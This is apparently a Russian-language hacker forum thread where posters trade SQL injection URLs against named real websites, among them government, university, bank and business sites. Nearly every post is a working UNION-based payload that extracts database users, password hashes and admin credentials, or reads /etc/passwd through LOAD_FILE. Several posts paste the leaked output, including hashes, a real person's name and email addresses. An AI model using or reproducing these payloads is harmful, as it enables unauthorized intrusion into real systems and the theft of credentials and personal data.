В 5 ветке подзапросы запрещены?.. Это к разговору о знаниях. Спокойно выборку по ключевым колонкам можно сделать Code: http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+table_name,2,3,4,5,6+from+INFORMATION_SCHEMA.columns++where+column_name=0x70617373776F7264/* и вот она твоя administrators... Code: http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+column_name,2,3,4,5,6+from+INFORMATION_SCHEMA.columns++where+table_name=0x61646D696E6973747261746F7273/* и таблы в ней
нашли табличку: inside_users Code: http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,table_name,5,6+from+INFORMATION_SCHEMA.TABLES+limit+42,1/* колумны: login Code: http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+4,1/* pwd Code: http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+5,1/* fio Code: http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+6,1/* email Code: http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+7,1/* icq Code: http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+8,1/* pwd_recover Code: http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x696e736964655f7573657273+limit+10,1/* вывод: vk:03f2816875e3a59a:Хворостов Владимир Александрович:[email protected]:: Code: http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,concat(login,0x3a,pwd,0x3a,fio,0x3a,email,0x3a,icq,0x3a,pwd_recover),5,6+from+inside_users+limit+0,1/*
Code: http://www.postbank.co.ke/index.php?do=payment&op=morepayments&id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,databas e()),4,5,6,7,8,9,10/* [email protected]:4.0.20-logostbank_skies Code: http://www.postbank.co.ke/index.php?do=payment&op=morepayments&id=-1+union+select+1,2,concat(user,0x3a,pass word) ,4,5,6,7,8,9,10+from+mysql.user/* root:4c03944b42669d53 Code: http://www.postbank.co.ke/index.php?do=payment&op=morepayments&id=-1+union+select+1,2,LOAD_FILE(char(47,101,116,99,47,112,97,115,115, 119,100)),4,5,6,7,8,9,10/* Code: http://galileo.co.ke/pages.php?p=32&ID=-1+union+select+1,concat(u ser(),0x3a,version(),0x3a,database()),3/* admin@localhost:5.0.26-standard:galileo Code: http://galileo.co.ke/pages.php?p=32&ID=-1+union+select+1,LOAD_FILE(char(47,101,116,99,4 7,112,97,115,115,119,100)),3/* Code: http://galileo.co.ke/pages.php?p=32&ID=-1+union+select+u ser,2,password+from+mysql.user/* faida 760b91c75fd34769 Code: http://www.landscrona.ru/articles/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13,14,15,16/* ultrspru_data@localhost:4.1.22-lk-log:ultrspru_data Code: http://www.d-kaz.com/reviews/review.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,databa se()),4,5,6,7,8,9 ,10,11,12,13,14,15/* вывод в исходнике dkasman@localhost:4.0.27-log:dkasman Code: http://azinba.com/companies.php?letter=d&id=9999+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database( )),5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21/* azinba@localhost:5.0.41-log:azinba_main
Code: http://www.poly.edu/news/fullNews.php?id=9999+union+select+1,2,3,4,5,6,7/* Code: http://www.biodiversityscotland.gov.uk/pageType2.php?id=-1/**/union/**/select/**/1,version(),3,4,5,6/*&type=2&navID=92 Code: http://www.buywithconfidence.gov.uk/tradeCategory.php?id=-1+union+select+1,2,3,4,5/*
HTML: http://meteoprog.ua/table.php?cityid=-1+union+select+null/* HTML: http://meteoprog.ua/table.php?cityid=-1+union+select+name+from+admin/*
Code: http://smart.am/eng/view.php?name=servicessystem&id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(version(), 0x 71),0x71),5,6,7/* Code: http://www.cpttm.org.mo/news_e.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(ve rsion(),0 x71),0x71),6,7,8,9,10,11,12,13,14,15/* Code: http://www.panmacjc.org.mo/showTopic.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6/* panmacjc_123456@localhost:5.0.19-standardanmacjc_panmacjc Давно нашел инъекцию на официальном сайте МакSим, Code: http://www.maxi-m.ru/news/?id=9999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7/*&c=html maxi@localhost:4.1.22:maxi_sql Code: http://www.maxi-m.ru/news/?id=9999+union+select+1,2,3,4,(username,0x3a,user_password,0x3a,user_email,0x3a,use r_icq),6,7+from+ php bb_users+limit+1,1 /*&c=html на данный момент форум не работает =\\
Code: http://www.razom.lviv.ua/index.php?cont=docs&did=-1+union+select+null,concat_ws(char(58),user,pass,name),null+from+users/* yura:e1f6e27996ac4b5fde1dc6a836e21275:Юрій Васильович .........
код: http://www.combined.biz/portfolio_details.php?id=-195+union+select+1,2,concat_ws(0x3a,password,email_addr,user_name,password_hash,last_name,first_name),4,5,6+from+user+limit+1,1/*
http://poderedomex.com/notas.asp?nota_id=1+or+1=(SELECT+TOP+1+nota_id+FROM+a_nota)-- источник) http://www.securitylab.ru/vulnerability/303771.php http://www.hiltonfoundation.org/main.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('report','category_tbl','ceremony','comd_list','conference','cyfd','DIY_TEMPCOMMAND_TABLE','dtproperties','extension_tbl','filetype_tbl','font_tbl','gaga_Commander_Tmp','GY_TmpTable','hyperlink_tbl','image_tbl','lulu','media_category_tbl'')--
Code: http://www.gsmserver.com.ua/spares/show_spares.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,load_file('/home'),19,20,21,22,23,24/* Code: http://www.gsmserver.com.ua/spares/show_spares.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,load_file('/etc/passwd'),19,20,21,22,23,24/* # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ фряха, читаем содержимое директорий, файлов
Вот парочка скл иньекций: HTML: http://www.motory.com.ua/news.phtml?id=-1+union+select+1,2,login,password+from+admin/* HTML: http://www.tours.com.ua/base.phtml?id=-1+union+select%201,2,3,4,5,6,7,8,9,10+from+base/*
Сори не выложил сразу вот еще одна HTML: http://www.ji-association.org/news.phtml?id=-1+union+select+111,222,333,444,555,666,777,888,999,10+from+users/*
HTML: http://www.pharm-system.com/?page=archive&rubid=-1+union+select+777+from+users/* HTML: http://www.lodka.com.ua/news.phtml?id=222+union+select+1,2,3,4+from+news/*
что-то последнее время все "пошли" на рідну неньку - Украину пароль в открытом виде /админка http://www.pokupai.mobi/admin/ / Сайт крупный со своей почтой, форумом, и тд /пс. этот сайт уже фигурировал в антибояне, но в другом скрипте http://wap.mobilnik.ua...../
gov.py Code: http://www.snna.gov.py/noticia.php?id=9999999/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3a,database()),4/* snna@localhost:4.1.20:snna Code: http://www.programaumbral.gov.py/eventos_ver.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9/* pupusaid_admin@localhost:4.0.25-standardupusaid_umbral Code: http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10,11,12/* 4.1.12 usr_seam@localhost seam Code: http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,password,aes_decrypt(aes_encrypt(user,0x71),0x71),4,5,6,7,8,9,10,11,12+from+mysql.user+limit+2,2/* fflores:773359240eb9a1d9 Code: http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,password,aes_decrypt(aes_encrypt(user,0x71),0x71),4,5,6,7,8,9,10,11,12+from+mysql.user+limit+3,3/* adm_seam:0504cab7628f6128 итд =\\\
Впервые вижу уязвимость в html скрипте 8),сам раскрутить не смог,может у кого получится код: http://www.vakansii.com.ua/showArticleNames.html?id=24+order+by+2/*
Cойдет? http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,database(),version(),user(),5,6,7,8,9,10,11,12/*
Там третья версия: Code: http://www.vakansii.com.ua/showArticleNames.html?id=24+OR 1=IF(SUBSTRING(VERSION(),1,1)=3,1,0)/* А в третьей версии ни подзапросов ни юниона нет... Можно если комуто совсем надо только подбирать